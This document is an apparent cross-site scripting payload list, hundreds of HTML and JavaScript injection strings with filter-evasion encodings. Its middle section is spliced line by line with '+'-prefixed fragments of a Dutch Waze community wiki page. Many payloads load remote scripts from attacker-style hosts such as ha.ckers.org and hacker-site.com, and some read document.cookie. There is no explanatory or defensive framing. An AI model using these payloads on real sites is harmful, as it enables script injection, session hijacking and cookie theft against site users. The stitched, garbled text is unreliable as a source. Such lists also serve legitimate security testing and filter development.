<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
 
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
 
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
 
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
 
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
 
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
 
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
 
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
 
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<A HREF="http://66.102.7.147/">XSS</A>
 
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
 
<A HREF="http://1113982867/">XSS</A>
 
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
 
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
 
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
 
<iframe  src="&Tab;javascript:prompt(1)&Tab;">
 
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
 
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
 
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
 
<img/src=`` onerror=this.onerror=confirm(1)
 
<form><isindex formaction="javascript&colon;confirm(1)"
 
<img src=``&NewLine; onerror=alert(1)&NewLine;
 
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
 
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
 
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
 
<script /**/>/**/alert(1)/**/</script /**/
 
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>
 
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
 
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
 
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
 
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
 
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
 
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
 
<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
 
</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
 
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
 
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
 
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
 
http://www.google<script .com>alert(document.location)</script
 
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
 
<img/src=@&#32;&#13; onerror = prompt('&#49;')
 
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
 
<script ^__^>alert(String.fromCharCode(49))</script ^__^
 
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
 
&#00;</form><input type&#61;"date" onfocus="alert(1)">
 
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
 
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
 
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
 
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
 
<script ~~~>alert(0%0)</script ~~~>
 
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
 
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
 
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
 
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
 
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
 
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
 
<div/style="width:expression(confirm(1))">X</div> {IE7}
 
<iframe// src=javaSCRIPT&colon;alert(1)
 
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
 
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
 
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
 
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
 
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
 
</plaintext\></|\><plaintext/onmouseover=prompt(1)
 
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
 
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
 
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
 
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
 
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
 
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
<var onmouseover="prompt(1)">On Mouse Over</var>
 
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
 
<img src="/" =_=" title="onerror='prompt(1)'">
 
<%<!--'%><script>alert(1);</script -->
 
<script src="data:text/javascript,alert(1)"></script>
 
<iframe/src \/\/onload = prompt(1)
 
<iframe/onreadystatechange=alert(1)
 
<svg/onload=alert(1)
 
<input value=<><iframe/src=javascript:confirm(1)
 
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
 
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
 
<img src=`xx:xx`onerror=alert(1)>
 
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
 
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
 
<math><a xlink:href="//jsfiddle.net/t846h/">click
 
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
 
<svg contentScriptType=text/vbs><script>MsgBox+1
 
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
 
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
 
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
 
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
 
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
 
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
 
<script>+-+-1-+-+alert(1)</script>
 
<body/onload=&lt;!--&gt;&#10alert(1)>
 
<script itworksinallbrowsers>/*<script* */alert(1)</script
 
<img src ?itworksonchrome?\/onerror = alert(1)
 
<svg><script>//&NewLine;confirm(1);</script </svg>
 
<svg><script onlypossibleinopera:-)> alert(1)
 
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
 
<script x> alert(1) </script 1=2
 
<div/onmouseover='alert(1)'> style="x:">
 
<--`<img/src=` onerror=alert(1)> --!>
 
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
 
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
 
"><img src=x onerror=window.open('https://www.google.com/');>
 
<form><button formaction=javascript&colon;alert(1)>CLICKME
 
<math><a xlink:href="//jsfiddle.net/t846h/">click
 
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
 
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
 
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
 
  
'';!--"<XSS>=&{()}
+
__TOC__
'>//\\,<'>">">"*"
+
==Wat is het== <!--T:3-->
'); alert('XSS
+
Waze is 's werelds grootste community-based verkeers en navigatie app. Er zijn veel navigatie apps. Veel van deze apps zijn gebaseerd op kaarten die een paar maal per jaar bijgewerkt worden. Dit zorgt voor al snel verouderde kaarten en onjuiste navigatie instructies. Waze is anders. De kaarten van Waze worden haast elke dag vernieuwd. De kaarten worden continu up-to-date gehouden door de vrijwilligers van de Nederlandse Waze gemeenschap. Dus, borden langs de kant van de weg "Navigatie uit" gelden niet voor Waze. Waze heeft de meest recente kaarten, en het is gratis.<br />
<script>alert(1);</script>
+
<br />
<script>alert('XSS');</script>
+
De app gebruikt kaart informatie en de [[GPS]] van je smartphone. Waze gebruikt waar mogelijk de al op je telefoon aanwezige kaarten van de routes die je eerder gereden hebt. Zo wordt het data gebruik beperkt. Kaarten van nieuwe gebieden en verouderde informatie worden van de Waze servers opgehaald. Wanneer je in de gebieden rijdt waar je onlangs eerder met Waze bent geweest is het mogelijk Waze te gebruiken zonder internet verbinding, maar de beste navigatie ervaring krijg je toch met een internet verbinding. Het data gebruik van de app is gematigd. De [https://www.anwb.nl/verkeer/tests/navigatie-apps/waze test van de ANWB] geeft een gebruik van 3,9 MB aan voor een rit van 75 km.<br />
<IMG SRC="javascript:alert('XSS');">
+
<br />
<IMG SRC=javascript:alert('XSS')>
+
Voor meer informatie over de Waze app kun je de [https://wazeopedia.waze.com/wiki/Global/Main_Page global Wiki page] bezoeken.<br />
<IMG SRC=javascript:alert('XSS')>
+
 
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+
==Wat kan ik doen== <!--T:4-->
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+
Ben je geïnteresseerd in wat jij kan doen voor de [[Community|Waze gemeenschap]]?<br />
<scr<script>ipt>alert('XSS');</scr</script>ipt>
+
<br />
<script>alert(String.fromCharCode(88,83,83))</script>  
+
Onze kaarten zijn erg compleet, maar steden, wegen, het platteland: alles verandert steeds. Jij bent het meest waardevol met jouw <i>locale kennis</i>. Jij kan ons helpen om de Waze kaart up-to-date te houden.
<img src=foo.png onerror=alert(/xssed/) />
+
<br />
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
+
:Zijn er wegwerkzaamheden bij jou in de buurt gepland?
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
+
:Wordt er een nieuwe wijk gebouwd?
<marquee><script>alert('XSS')</script></marquee>
+
:Worden er nieuwe wegen aangelegd?
<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
+
:Zijn er wijzigingen in een- / twee-richting verkeer?
<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
+
:Soms missen er nog gegevens of zijn deze niet meer accuraat. Denk aan: <i>maximum snelheid</i>, <i>huisnummers</i>. 
<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
+
<br />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
Zijn er in jouw buurt <i>bijzondere plaatsen / locaties</i> die voor Wazers interessant kunnen zijn als bestemming  zoals een <i>tankstation</i>, <i>parkeerplaats</i>, <i>ziekenhuis</i>, <i>school</i> etcetera.
"><script>alert(0)</script>
+
Ga na of ze al op de kaart voorkomen en of de aangegeven informatie nog klopt. (Openingstijden, telefoonnummer, e.d.)<br />
<script src=http://yoursite.com/your_files.js></script>
+
<br />
</title><script>alert(/xss/)</script>
+
Wanneer je nieuw bent en je wilt ons helpen met het bijwerken van de kaart, lees dan vooral eerst de [[Quick start guide]] door en vergeet vervolgens niet de pagina [[Improve your skills|Verbeter je vaardigheden]] te bekijken. En, wanneer je de kaart aan het bewerken bent: houd de [[KISS|KISS principes]] voor ogen!<br />
</textarea><script>alert(/xss/)</script>
+
<br />
<IMG LOWSRC=\"javascript:alert('XSS')\">
+
[http://bit.ly/SlackInviteBNL Slack] is ons belangrijkste onderlinge communicatie middel. Meld je aan via de [http://bit.ly/SlackInviteBNL Slack invitatie pagina]. Wanneer je vragen hebt, aarzel niet ze te stellen. Er zijn hier altijd ervaren editors beschikbaar om je vragen te beantwoorden. Ook het lezen van andermans vragen en antwoorden kan heel leerzaam zijn.<br />
<IMG DYNSRC=\"javascript:alert('XSS')\">
+
<br />
<font style='color:expression(alert(document.cookie))'>
+
Voor een schematisch overzicht van de mogelijkheden voor beginners zie het [[Starters Summary|Beginners overzicht]].
<img src="javascript:alert('XSS')">
+
 
<script language="JavaScript">alert('XSS')</script>
+
==Hoe kan ik het doen== <!--T:5-->
<body onunload="javascript:alert('XSS');">
+
Wanneer je hier bent om een antwoord te vinden op een gedetailleerde vraag en je hebt de [[Quick start guide]] al gelezen, kijk dan eens naar de volgende pagina's:
<body onLoad="alert('XSS');"
+
* [[Road types|Wegtypen]]
[color=red' onmouseover="alert('xss')"]mouse over[/color]
+
* [[Places|Plaatsen]]
"/></a></><img src=1.gif onerror=alert(1)>
+
* [[Closures|Afsluitingen]] and [[Restrictions|restricties]]
window.alert("Bonjour !");
+
* [[Community|Gemeenschap]]
<div style="x:expression((window.r==1)?'':eval('r=1;
+
Of gebruik de [[Index]].<br />
alert(String.fromCharCode(88,83,83));'))">
+
<br />
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
+
Wanneer je het antwoord niet in onze [[Hoofdpagina|Nederlandse wiki]] kunt vinden, kun je ook altijd verder zoeken in de [https://wazeopedia.waze.com/wiki/Global/Main_Page global Waze Wiki].<br />
"><script alert(String.fromCharCode(88,83,83))</script>
+
<br />
'>><marquee><h1>XSS</h1></marquee>
+
{{Bottomline}}
'">><script>alert('XSS')</script>
+
</translate>
'">><marquee><h1>XSS</h1></marquee>
 
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
 
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
 
<script>var var = 1; alert(var)</script>
 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
 
<IMG SRC='vbscript:msgbox(\"XSS\")'>
 
" onfocus=alert(document.domain) "> <"
 
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
 
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
 
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
 
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
 
<br size=\"&{alert('XSS')}\">
 
<scrscriptipt>alert(1)</scrscriptipt>
 
</br style=a:expression(alert())>
 
</script><script>alert(1)</script>
 
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
 
[color=red width=expression(alert(123))][color]
 
<BASE HREF="javascript:alert('XSS');//">
 
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
 
"></iframe><script>alert(123)</script>
 
<body onLoad="while(true) alert('XSS');">
 
'"></title><script>alert(1111)</script>
 
</textarea>'"><script>alert(document.cookie)</script>
 
'""><script language="JavaScript"> alert('X \nS \nS');</script>
 
</script></script><<<<script><>>>><<<script>alert(123)</script>
 
<html><noalert><noscript>(123)</noscript><script>(123)</script>
 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
 
'></select><script>alert(123)</script>
 
'>"><script src = 'http://www.site.com/XSS.js'></script>
 
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
 
<SCRIPT>document.write("XSS");</SCRIPT>
 
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
 
='><script>alert("xss")</script>
 
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
 
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
 
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
 
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
 
src="http://www.site.com/XSS.js"></script>
 
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
 
!--" /><script>alert('xss');</script>
 
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
 
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
 
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
 
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
 
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
 
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
 
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
 
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
 
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
 
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
 
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
 
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
 
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
 
'); alert('xss'); var x='
 
\\'); alert(\'xss\');var x=\'
 
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
 
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
 
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
 
</body>
 
</html>
 
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
 
<SCRIPT> alert(“XSS”); </SCRIPT>
 
<BODY ONLOAD=alert("XSS")>
 
<BODY BACKGROUND="javascript:alert('XSS')">
 
<IMG SRC="javascript:alert('XSS');">
 
<IMG DYNSRC="javascript:alert('XSS')">
 
<IMG LOWSRC="javascript:alert('XSS')">
 
<IFRAME SRC=”http://hacker-site.com/xss.html”>
 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
 
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
 
<TABLE BACKGROUND="javascript:alert('XSS')">
 
<TD BACKGROUND="javascript:alert('XSS')">
 
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
 
<DIV STYLE="width: expression(alert('XSS'));">
 
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
 
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
 
&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
 
&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
 
&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
 
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
 
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
 
&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
 
&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
 
&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
 
&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
 
&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
 
&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
 
&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
 
&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
 
&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
 
Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
 
exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
 
&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
 
&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
 
&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
 
&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
 
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
 
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
 
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
 
&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
 
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
 
&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
 
a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
 
&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
 
&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;
 
&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
 
